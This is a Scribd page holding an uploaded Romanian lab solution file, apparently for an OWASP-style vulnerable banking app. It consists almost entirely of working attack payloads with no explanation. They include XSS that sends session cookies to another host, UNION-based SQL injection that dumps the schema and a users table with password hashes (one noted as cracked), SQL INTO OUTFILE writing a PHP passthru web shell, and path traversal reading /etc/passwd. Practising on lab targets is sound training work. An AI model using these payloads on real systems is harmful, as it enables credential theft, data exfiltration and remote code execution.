Scribd Logo
Încărcați

Bine ați venit la Scribd!

  • Rezolvari

    Încărcat de

    Mihai Andries
    15 vizualizări2 pagini
    owasp

    Titlu original

    rezolvari

    Drepturi de autor

    © © All Rights Reserved

    Formate disponibile

    TXT, PDF, TXT sau citiți online pe Scribd

    Vi se pare util acest document?

    Este necorespunzător acest conținut?

    Raportați acest document
    owasp

    Drepturi de autor:

    © All Rights Reserved
    Descărcați ca TXT, PDF, TXT sau citiți online pe Scribd
    Indicator pentru conținut neadecvat
    15 vizualizări2 pagini

    Rezolvari

    Încărcat de

    Mihai Andries
    owasp

    Drepturi de autor:

    © All Rights Reserved
    Descărcați ca TXT, PDF, TXT sau citiți online pe Scribd
    Indicator pentru conținut neadecvat
    din 2

    http://192.168.152.128/signin.php?

    appver=2.3"><script>document.forms[0].action="http://192.168.1.103"</script><p

    http://192.168.152.128/signin.php?
    appver=2.3"><script>document.forms[0].action="http://192.168.1.103/cookie="%2Bdocum
    ent.cookie%2B""</script><p

    ----

    <script> document.write("</tr> <tr> <td> 27 </td> <td> 4068444801665127 </td>


    <td> 4916843735650523 </td> <td> 11.0000 </td> <td> RON </td> <td>") </script>

    <script> document.write("<td>Plata utilitate apa</td> <tr><td> 19 </td> <td>


    4068444801665127 </td> <td> 4916843735650523 </td> <td> 100.0000 </td> <td> RON
    </td> <td>Charge Back</td> </tr>")</script>

    <script>document.write("<img
    src='http://192.168.1.106/cookie="+document.cookie+"' />");</script>
    ----

    SELECT table_schema,table_name FROM information_schema.tables

    SELECT table_schema FROM information_schema.tables

    http://192.168.152.128/payment_history.php?account_no=44855' UNION select


    1,2,3,table_schema,5,6,7 FROM information_schema.tables -- 80711356672

    http://192.168.152.128/payment_history.php?account_no=44855' UNION select


    1,2,3,table_name,5,6,7 FROM information_schema.tables -- 80711356672

    http://192.168.152.128/payment_history.php?account_no=44855' UNION select


    1,2,3,table_name,5,6,7 FROM information_schema.tables where table_schema =
    'noobank' -- 80711356672

    No Source Account Destination Account Amount Currency Details


    1 2 3 accounts 5 6
    2 2 3 transactions 5 6
    3 2 3 users 5 6

    http://192.168.152.128/payment_history.php?account_no=44855' UNION select


    1,2,3,column_name,5,6,7 FROM information_schema.columns WHERE table_schema !=
    'mysql' AND table_schema != 'information_schema' -- 80711356672
    http://192.168.152.128/payment_history.php?account_no=44855' UNION select
    1,2,my_user,my_pass,5,6,7 FROM users WHERE 1 -- 80711356672
    admin 611cf29894980e7b402ce6b3302eaf9f

    bonnie c2075acb16b3879f562f0784ec5f3675
    clyde 483f049a90115fc538ab48eb463ddfb1

    http://www.md5online.org/ Admin149

    -------

    /var/www/html/noobank

    <?phppassthru($_GET['cmd']); ?>

    select '<?phppassthru($_GET['cmd']); ?>' into outfile


    '/var/www/html/noobank/file.txt'

    http://192.168.152.128/payment_history.php?account_no=44855' UNION select


    1,2,3,'aaaaa',5,6,7 into outfile '/var/www/html/noobank/file.txt' -- 587588

    <? phppassthru($_GET['cmd']); ?>

    http://192.168.152.128/payment_history.php?account_no=44855' UNION select 1,2,3,"<?


    php passthru($_GET['cmd']); ?>",5,6,7 into outfile '/var/www/html/noobank/out.php'
    -- 587588

    -------

    http://192.168.152.128/payment_history.php?
    account_no=4916843735650523&save=true&file=reports/4916843735650523-26.10.2016-
    04:24:34.csv

    http://192.168.152.128/payment_history.php?
    account_no=4916843735650523&save=true&file=/etc/issue

    ../../../../etc/passwd

    S-ar putea să vă placă și